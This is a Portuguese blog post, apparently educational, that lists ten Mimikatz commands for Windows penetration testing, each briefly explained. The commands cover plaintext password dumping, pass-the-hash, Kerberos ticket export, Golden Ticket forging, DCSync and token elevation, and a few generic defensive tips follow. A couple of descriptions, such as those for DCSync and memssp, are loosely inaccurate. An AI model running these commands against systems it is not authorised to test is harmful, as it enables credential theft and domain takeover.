No cenário em constante evolução da cibersegurança, as ferramentas e técnicas utilizadas tanto pelos defensores como pelos atacantes estão em constante avanço. Entre a infinidade de ferramentas disponíveis, o Mimikatz se destaca como um utilitário particularmente poderoso e versátil que se tornou um elemento básico nos arsenais tanto de profissionais de segurança quanto de agentes mal-intencionados. Desenvolvido por Benjamin Delpy, o Mimikatz ganhou reputação por sua capacidade de extrair senhas de texto simples, hash, códigos PIN e tickets Kerberos da memória, tornando-o um recurso inestimável para compreender e lidar com roubo de credenciais e escalonamento de privilégios em ambientes Windows.

Dito isso, abaixo separamos para você 10 comandos para testes de  invasão Windows Mimikatz com orientações para cibersegurança, vamos lá!

10 Comandos para Testes de  Invasão Windows Mimikatz

1. privilege::debug

Concede ao processo atual privilégios de depuração,permitindo o acesso a tokens de segurança.

2. sekurlsa::logonpasswords

Extrai senhas de logon em texto plano e hashs de senha do sistema Windows.

3. sekurlsa::pth /user:<usuário> /domain:<domínio> /ntlm:<hash>

Realiza a técnica “Pass-the-Hash”, autenticando-se em um sistema remoto com um hash de senha.

4. sekurlsa::tickets /export

Extrai tickets Kerberos para análise ou uso posterior, incluindo Golden Tickets e Silver Tickets.

5. lsadump::sam

Extrai o banco de dados SAM (Security Account Manager), que armazena informações de conta de usuário e senhas em hashes.

6. lsadump::dcsync /domain:<domínio>

Obtém hashes de senha de contas de usuário do Active Directory usando a função DRSReplicaGetInfo().

7. kerberos::golden /user:<usuário> /domain:<domínio> /sid:<SID>

Gera um Golden Ticket para obter acesso persistente a sistemas Windows.

8. kerberos::ptt <caminho do ticket.kirbi>

Passa um ticket Kerberos forjado para o sistema, permitindo acesso como o usuário especificado no ticket.

9. token::elevate

Eleva o token de segurança atual para o token mais alto disponível, concedendo privilégios administrativos.

10. misc::memssp

Ativa o protocolo de segurança de provedor de serviços de memória (MemSSP) para passar hashes de senha para autenticação.

Orientações gerais

• Divida a rede em segmentos menores e restrinja o tráfego.
• Implemente sistemas de monitoramento de eventos de segurança.
• Estabeleça políticas de senha robustas que exijam senhas longas e complexas
• Limite o acesso aos tokens de segurança
• …e outras medidas.

Confira também: 10 Ferramentas Windows para Cibersegurança

Gostou do conteúdo? Se você deseja aprofundar mais seu conhecimento sobre cibersegurança, confira os nossos cursos disponíveis. 

CONFIRA TAMBÉM:

• 
  28.09.2024 | Carreiras em Cibersegurança

  Vulnerabilidade CVE-2024-8636: Falha de Heap Buffer Overflow no Google Chrome

  Afeta dispositivos que executam o Google Chrome, incluindo Windows, macOS, Linux, e Chrome OS. Também afeta navegadores baseados no Chromium, como o Microsoft Edge. A CVE-2024-8636 é uma vulnerabilidade de Heap Buffer Overflow na biblioteca gráfica […]

• 
  27.09.2024 | Carreiras em Cibersegurança

  10 Práticas Essenciais para Proteger Sistemas de IA contra Ameaças Atuais

  A Inteligência Artificial (IA) está se tornando cada vez mais presente em nossas vidas, oferecendo soluções inovadoras e melhorando a eficiência em diversos setores. No entanto, à medida que a IA avança, surgem também novos desafios […]